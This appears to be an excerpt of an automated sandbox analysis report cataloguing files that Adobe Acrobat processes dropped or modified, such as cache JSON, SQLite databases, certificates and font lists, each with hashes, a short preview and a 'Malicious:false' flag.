                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341064104987871","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":179539},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:modified
                                                          Size (bytes):476
                                                          Entropy (8bit):4.9782967969994605
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sqBsBdOg2H9MZcaq3QYiubPyP7E4TX:Y2sRdsPdMHug3QYhbC7n7
                                                          MD5:04C18A356AF24BF6624C18BD9842F39D
                                                          SHA1:26B209C56CD4A47EFB5F076E959478C1E4F0A49D
                                                          SHA-256:3A3F213357D8C9B4F8037A5C6E733B6DD36F0A6580F56AD99468D548802892BE
                                                          SHA-512:EF4A11AB60D4B73B7BF6DA95F68A638C8FAC6CA4930F34E91276E00431D11E78F924BE23B6216A2AE8D9E84E1DBA63232AC23980C8DA8D55E29A90C4A4B688EB
                                                          Malicious:false
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378056139210659","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":630874},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):476
                                                          Entropy (8bit):4.971308936549284
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sq1sBdOg2HCcaq3QYiubPyP7E4TX:Y2sRdsTdMHN3QYhbC7n7
                                                          MD5:9DED1C09A5BF5786A6517CEEA68DC0C7
                                                          SHA1:F3213474F6BB0938812FFECD151F8FC6726CCBAC
                                                          SHA-256:F15AF223B9643822E857CBCCAC24A50F65AF34313C6964B7F81ACFBAE218FA3E
                                                          SHA-512:7E0ADC5AD0DFF2996E6D09E8C8124A1A8D043582DD37861A100D1BB066033F3E0E46AA85A16A418C065E36938E04BB62EE6729946311CF4099BB786035BF7A35
                                                          Malicious:false
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341064104987871","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":179539},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):476
                                                          Entropy (8bit):4.971308936549284
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sq1sBdOg2HCcaq3QYiubPyP7E4TX:Y2sRdsTdMHN3QYhbC7n7
                                                          MD5:9DED1C09A5BF5786A6517CEEA68DC0C7
                                                          SHA1:F3213474F6BB0938812FFECD151F8FC6726CCBAC
                                                          SHA-256:F15AF223B9643822E857CBCCAC24A50F65AF34313C6964B7F81ACFBAE218FA3E
                                                          SHA-512:7E0ADC5AD0DFF2996E6D09E8C8124A1A8D043582DD37861A100D1BB066033F3E0E46AA85A16A418C065E36938E04BB62EE6729946311CF4099BB786035BF7A35
                                                          Malicious:false
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341064104987871","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":179539},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4553
                                                          Entropy (8bit):5.237363455532997
                                                          Encrypted:false
                                                          SSDEEP:96:odxquQuhxqVAq0Czrh6CzxtSzK3/tjsqnlfjejy4XOlPXflziHkBH:oqupGVTbzrhtzxtSzK3/dRnlLejyE4vB
                                                          MD5:01DBFA78B42E4C0CB0548077834A3F85
                                                          SHA1:5BB224D071B1EE8CBBAAD9125C7BDCF825CDFD5F
                                                          SHA-256:71728823C1A008159496B13968F3177E32F3F8884264B3F6214A9E8090972336
                                                          SHA-512:A32216F4F55E324821E0BD4949DF43B685FE733D59015C786B541892506A6B8690B069E9ADB3EB02DB88143BD5CAEBE0ADD3617AA64701BBA0EFCA57BF29844C
                                                          Malicious:false
                                                          Preview:*...#................version.1..namespace-n.X.o................next-map-id.1.Pnamespace-8da8a5d4_15b5_4830_8c1c_ca066d0e12ed-https://rna-resource.acrobat.com/.0gKY.r................next-map-id.2.Snamespace-81b0e21e_1c2a_4917_a98d_db6892e18c4b-https://rna-v2-resource.acrobat.com/.1^b..r................next-map-id.3.Snamespace-181ade60_1d4c_4d63_87fe_e85b67c781b7-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-73e7b78c_6cea_4091_906b_b0f0cc6a8ce0-https://rna-resource.acrobat.com/.3C[.[^...............Pnamespace-8da8a5d4_15b5_4830_8c1c_ca066d0e12ed-https://rna-resource.acrobat.com/D..B^...............Pnamespace-73e7b78c_6cea_4091_906b_b0f0cc6a8ce0-https://rna-resource.acrobat.com/..Ga...............Snamespace-181ade60_1d4c_4d63_87fe_e85b67c781b7-https://rna-v2-resource.acrobat.com/.;0ca...............Snamespace-81b0e21e_1c2a_4917_a98d_db6892e18c4b-https://rna-v2-resource.acrobat.com/.\.go................next-map-id.5.Pnamespace-5e456334_9beb_4082_9dbc_
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):324
                                                          Entropy (8bit):5.141236030377576
                                                          Encrypted:false
                                                          SSDEEP:6:FbVIq2PsZ2nKuAl9OmbzNMxIFUt8cbRFZZmw+cbj7TRFkwOsZ2nKuAl9OmbzNMFd:F5IvkcHAa8jFUt8c3Z/+cPXRF51cHAab
                                                          MD5:5ABFCE4D9D9A72757C5863624D0943C5
                                                          SHA1:E2852712F98110A48142D56F8F3B326E2F5D9712
                                                          SHA-256:5BEBD49546E0D94A06F13E64A24105EA1B0B405EB70600EAF268285D13B06A7E
                                                          SHA-512:5459B41758EC4EB043AB25F80FE5611DB15CFE625BF71A4C6DF2110E5FA65F3ADE958D99A34DC6A4A88FB24B54DCBA98407B8ABED12D52C3F2FD2E1331E760C5
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:10.130 1744 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:42:10.190 1744 Recovering log #3.2024/12/06-09:42:10.204 1744 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):324
                                                          Entropy (8bit):5.141236030377576
                                                          Encrypted:false
                                                          SSDEEP:6:FbVIq2PsZ2nKuAl9OmbzNMxIFUt8cbRFZZmw+cbj7TRFkwOsZ2nKuAl9OmbzNMFd:F5IvkcHAa8jFUt8c3Z/+cPXRF51cHAab
                                                          MD5:5ABFCE4D9D9A72757C5863624D0943C5
                                                          SHA1:E2852712F98110A48142D56F8F3B326E2F5D9712
                                                          SHA-256:5BEBD49546E0D94A06F13E64A24105EA1B0B405EB70600EAF268285D13B06A7E
                                                          SHA-512:5459B41758EC4EB043AB25F80FE5611DB15CFE625BF71A4C6DF2110E5FA65F3ADE958D99A34DC6A4A88FB24B54DCBA98407B8ABED12D52C3F2FD2E1331E760C5
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:10.130 1744 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:42:10.190 1744 Recovering log #3.2024/12/06-09:42:10.204 1744 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                          Category:dropped
                                                          Size (bytes):86016
                                                          Entropy (8bit):4.438578910983537
                                                          Encrypted:false
                                                          SSDEEP:384:yeCci5GViBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:NZurVgazUpUTTGt
                                                          MD5:3816518F89B6476E5998B4D6DAFDA2C5
                                                          SHA1:3E694CF6E5B73B5CB2C4C28EA89AB3BDC944627B
                                                          SHA-256:4DCDD596065AA925A8A8B49EEA12C1E34E0CA688326231068A52A1331B5CE49A
                                                          SHA-512:CC61B5236778A646C9C892224A815EC9519440EF115D4B26DEF079DA123326C5CF241244E6D45C59BA89EF929FCCCFE61945CE777D88328AED0557E096823EE0
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite Rollback Journal
                                                          Category:dropped
                                                          Size (bytes):8720
                                                          Entropy (8bit):3.7678580561285004
                                                          Encrypted:false
                                                          SSDEEP:48:7MBJioyVAioyuoy1C7oy16oy1iKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1OX:7WJuAeJXjBiBb9IVXEBodRBku
                                                          MD5:642C7438197BB01BA984C41E653AA39D
                                                          SHA1:DDEFC04479CC4F40FA1BC9BA113FA62C48E9B1AE
                                                          SHA-256:0F8EF9BFC794B1A8B3EE6825E0CBF522C794E74E80886AD5D32CBB99976941B2
                                                          SHA-512:E2DF35A04EE64F72924529BBBC039C1C61F08F7D8ADD861BA2B3A377DF36585421D476D0EBBB310FE9EF624EE1D604AC6895ACC6C314F793D6C05934E12F0385
                                                          Malicious:false
                                                          Preview:.... .c.....0..<...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:Certificate, Version=3
                                                          Category:dropped
                                                          Size (bytes):1391
                                                          Entropy (8bit):7.705940075877404
                                                          Encrypted:false
                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                          Malicious:false
                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                          Category:dropped
                                                          Size (bytes):71954
                                                          Entropy (8bit):7.996617769952133
                                                          Encrypted:true
                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                          Malicious:false
                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):192
                                                          Entropy (8bit):2.7895108629891827
                                                          Encrypted:false
                                                          SSDEEP:3:kkFklhd6IdkfllXlE/HT8k2Skh/XNNX8RolJuRdxLlGB9lQRYwpDdt:kKFIjT8aqdNMa8RdWBwRd
                                                          MD5:FD8BDCF4EACBC3AA2E311043327A650C
                                                          SHA1:616C90681EC5B09AF30B9AAB988A638B8A7CD8C1
                                                          SHA-256:A3947A53A91381F7F6D9BDB7BBA4A62CE4EC851418520CB567688DE40F672EF2
                                                          SHA-512:C41C8048FA28CEAC1FF83CD160A8830D71B027DBCE2BC9396CC2FE97C442C65E76838F4111BD916DA4C2AF158DAD6B6647D62B72FB421D7807E0FEC90A40F43D
                                                          Malicious:false
                                                          Preview:p...... .........8...G..(....................................................... ..........W.....7..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):328
                                                          Entropy (8bit):3.229173143320742
                                                          Encrypted:false
                                                          SSDEEP:6:kKB9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:oDImsLNkPlE99SNxAhUe/3
                                                          MD5:17487550E44481D49AFFE53D545EA374
                                                          SHA1:E37DE010B2DC80B2197A53BB8EC082A14AD84F57
                                                          SHA-256:D3352701EB2013FB6D3969C1F8C0BC257FA20846E6EBC38C68E601F83C952702
                                                          SHA-512:FE226CACD81ACAB47551CBD5E400BF2F8A001BDC58BEBA82EBBE0027EB339D8F7E52BD12AF56CFAF7E181243CA3963AF2A046F37DA919EA1C8CC26F66551F4E7
                                                          Malicious:false
                                                          Preview:p...... .........yo!.G..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PostScript document text
                                                          Category:dropped
                                                          Size (bytes):1233
                                                          Entropy (8bit):5.233980037532449
                                                          Encrypted:false
                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                          Malicious:false
                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PostScript document text
                                                          Category:dropped
                                                          Size (bytes):1233
                                                          Entropy (8bit):5.233980037532449
                                                          Encrypted:false
                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                          Malicious:false
                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PostScript document text
                                                          Category:dropped
                                                          Size (bytes):1233
                                                          Entropy (8bit):5.233980037532449
                                                          Encrypted:false
                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                          Malicious:false
                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PostScript document text
                                                          Category:dropped
                                                          Size (bytes):10880
                                                          Entropy (8bit):5.214360287289079
                                                          Encrypted:false
                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                          Malicious:false
                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PostScript document text
                                                          Category:dropped
                                                          Size (bytes):10880
                                                          Entropy (8bit):5.214360287289079
                                                          Encrypted:false
                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                          Malicious:false
                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):0.8112781244591328
                                                          Encrypted:false
                                                          SSDEEP:3:e:e
                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                          Malicious:false
                                                          Preview:....
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):2145
                                                          Entropy (8bit):5.073454340409002
                                                          Encrypted:false
                                                          SSDEEP:48:Ys/Y0Oqc0aIJYnW2IKbI8CIgIdTciIp0INI90IzlIdKsaIZ:nBOOhSFTeI95+Ksh
                                                          MD5:42C859CABE5BB4BE8B06C3A5883BF6C3
                                                          SHA1:0462A765D25CAFC61062FBD7EEF3C8461E0ED000
                                                          SHA-256:D8946E414F351E29B72D6C603EC11BE43875BD58819B57D782ED30F9E8126D3F
                                                          SHA-512:67C446D3D8E6C166E7848AB2D3F9D5CA0CEEC0650406672E546DB72A8EBAADFAEA6348D8B596E1C07B24B86EE1B093528D07AD25813F52941CF39218A46B7CAE
